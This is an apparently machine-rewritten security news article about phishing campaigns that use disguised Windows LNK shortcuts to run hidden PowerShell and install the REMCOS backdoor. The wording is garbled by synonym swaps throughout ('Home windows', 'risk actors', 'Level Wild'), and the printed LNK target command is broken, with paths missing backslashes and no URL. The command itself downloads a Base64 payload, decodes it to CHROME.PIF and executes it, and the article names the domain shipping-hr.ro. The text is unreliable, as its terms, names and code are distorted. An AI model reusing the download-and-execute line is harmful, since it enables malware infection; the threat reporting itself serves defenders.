In current weeks, cybersecurity groups have noticed a surge in malicious campaigns exploiting Home windows shortcut (LNK) information to ship subtle backdoors.
This new wave of assaults disguises LNK shortcuts as innocuous paperwork or folders, counting on Home windows’ default habits of hiding identified file extensions to deceive customers.
As soon as executed, the shortcut silently invokes PowerShell with hidden window parameters, fetching and decoding a Base64 payload that in the end installs the REMCOS backdoor.
The stealthy nature of this chain—combining social engineering, fileless scripting, and living-off-the-land binaries—underscores the evolving techniques of risk actors focusing on enterprise environments.
Level Wild analysts famous that the preliminary supply usually arrives by way of phishing emails, with attachments labeled as invoices or transport paperwork.
In different circumstances, risk actors plant these malicious shortcuts inside ZIP or RAR archives on community shares, relying on informal shopping to set off execution.
How LNK File look to a standard person (Supply – Level Wild)
Upon double-clicking, the LNK file silently launches powershell.exe -WindowStyle hidden -Command (…), directing the sufferer’s machine to obtain an obfuscated payload from a distant server.
Level Wild researchers recognized that the downloaded file masquerades with a .GIF extension however incorporates Base64-encoded binary knowledge.
The marketing campaign’s spine is a multi-stage an infection workflow. The embedded PowerShell script retrieves an encoded textual content useful resource, writes it to C:ProgramDataHEW.GIF, decodes it right into a Home windows PIF file named CHROME.PIF by way of [System.Convert]::FromBase64String, then executes this binary.
Content material of LNK file (Supply – Level Wild)
The PIF file, disguised as a Chrome-themed program, leverages legacy assist for MS-DOS shortcuts to bypass trendy safety warnings. As soon as launched, it drops extra artifacts—together with a scheduled process shortcut and a URL file—to make sure persistence and facilitate additional payload execution.
Affect assessments reveal that the REMCOS backdoor grants attackers full distant management over compromised hosts.
REMCOS communicates over TCP with a customized binary protocol, enabling arbitrary shell command execution, file switch, keylogging, and even webcam seize.
Victims usually stay unaware of the breach, because the malware shops keystroke logs in C:ProgramDataremcoslogs.dat and establishes encrypted channels with command-and-control servers hosted in Jap Europe.
The mix of stealthy execution and strong distant capabilities poses a major threat to company networks, the place lateral motion and knowledge exfiltration can observe preliminary compromise.
An infection Mechanism
The an infection mechanism hinges on exploiting LNK file properties to load malicious instructions. Not like Workplace macros, LNK information don’t set off macro safety warnings, permitting execution with out person suspicion.
On this marketing campaign, the LNK’s “Goal” subject is about to:-
C:windowsSystem32WindowsPowerShellv1.0powershell.exe -WindowStyle hidden -Command (new-object System.Internet.WebClient).DownloadFile(‘ $file=”C:ProgramDataHEW.GIF”; [System.Convert]::FromBase64String((Get-Content material $file)) | Set-Content material C:ProgramDataCHROME.PIF -Encoding Byte; begin C:ProgramDataCHROME.PIF
This single-line command demonstrates the class of fileless assaults: it makes use of System.Internet.WebClient to fetch the Base64 blob, then decodes and executes it completely in reminiscence.
Whereas the an infection workflow exhibits that how Home windows shows the misleading .lnk icon, hiding the precise payload path.
An infection Workflow (Supply – Level Wild)
Attackers additional obfuscate detection by embedding malware inside Alternate Knowledge Streams or crafting the icon path to level to malicious DLLs, triggering code execution when Home windows makes an attempt to render the shortcut icon.
By weaponizing LNK information, adversaries bypass many endpoint protections that target executable file blocks and macro detections.
The reliance on trusted system binaries, similar to PowerShell and CMD, permits the REMCOS installer to evade signature-based antivirus instruments.
For defenders, monitoring uncommon PowerShell invocations and outbound connections to suspicious domains like shipping-hr.ro is important.
Enhanced visibility into scheduled duties, ADS utilization, and newly created .PIF information will help determine and include this rising risk.
Combine ANY.RUN TI Lookup along with your SIEM or SOAR To Analyses Superior Threats -> Strive 50 Free Trial Searches
